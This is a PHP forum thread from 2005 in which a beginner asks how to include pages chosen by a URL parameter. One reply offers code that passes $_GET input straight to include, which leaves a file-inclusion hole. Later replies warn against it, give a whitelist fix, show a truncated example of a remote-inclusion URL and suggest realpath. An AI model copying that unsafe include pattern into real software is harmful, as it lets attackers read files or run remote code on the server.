newbie's question

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

Post Reply
scorpio2002
Forum Newbie
Posts: 2
Joined: Tue May 31, 2005 9:00 am

newbie's question

Post by scorpio2002 »

Hi there!
I'm new to php and I've recently learnt to use "include" to include a file in my php page. Now I'd like to be able to achieve more.

I'd like "include" to work with variables. For example... It I type " http://www.mypage.it/index?=credits.html " I'd like the include command to include the page credits.html.
If I'm not mistaken, the following site uses something like that: http://www.baslug.org/index.php

Is that possibile?
Thank you in advance.

Donato

p.s.: sorry for my English...
User avatar
Skara
Forum Regular
Posts: 703
Joined: Sat Mar 12, 2005 7:13 pm
Location: US

Post by Skara »

wrong forum. Use this instead:
http://example.com/?file=example.html
then,

Code: Select all

if (file_exists($_GET['file'])) include $_GET['file'];
else print("File not found.");
User avatar
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

Do not use that code

It can introduce serious security problems. Make sure that the filename is in an allowed directory.
scorpio2002
Forum Newbie
Posts: 2
Joined: Tue May 31, 2005 9:00 am

Post by scorpio2002 »

Do not use that code
ehm.. could you be clearer? What's the secutiry issue with this code? And so, what should I use to achieve what I want? :D

Thank you in advance :P
User avatar
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto
Contact:

Post by John Cartwright »

I tend to create an array of accepted pages.

Code: Select all

$valid = array('home','news','forums');
And when calling a page I see whether or not it exists in the page.
If it exists, then the page call is valid, if not, redirect them somewhere else, such as a 404 page.
You should also make sure the page exists, just because thats common sense :)

Code: Select all

//make sure $page has a value, if not assign it a default
$page = !empty($_GETї'page']) ? $_GETї'page'] : 'home';
if (in_array($page,$valid) && file_exists($page.'.php'))
{
     include($page.'.php');
}
else
{
     include('404.html');
}
Without doing this check, you could potentially load of php script from another server, and it could 1) bring down your site and possibly server 2) gather important information about your site

an example of this attack would be http://www.domain.com/?page=http://badd ... script.php
User avatar
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Post by Chris Corbyn »

:arrow: Moved to PHP Code :?
User avatar
Skara
Forum Regular
Posts: 703
Joined: Sat Mar 12, 2005 7:13 pm
Location: US

Post by Skara »

Ambush Commander wrote:Do not use that code

It can introduce serious security problems. Make sure that the filename is in an allowed directory.
Of course. But as he's a newb, I doubt he's designing some high-profile site or anything. ;)
User avatar
CoderGoblin
DevNet Resident
Posts: 1425
Joined: Tue Mar 16, 2004 10:03 am
Location: Aachen, Germany

Post by CoderGoblin »

Skara wrote: Of course. But as he's a newb, I doubt he's designing some high-profile site or anything. ;)
Better to learn how to do things correctly from the start though. If you program well while learning it will become instinctive.
timvw
DevNet Master
Posts: 4897
Joined: Mon Jan 19, 2004 11:11 pm
Location: Leuven, Belgium

Post by timvw »

I've found http://www.php.net/realpath to be very usefull to determine if the file is really in the wanted directory....
Post Reply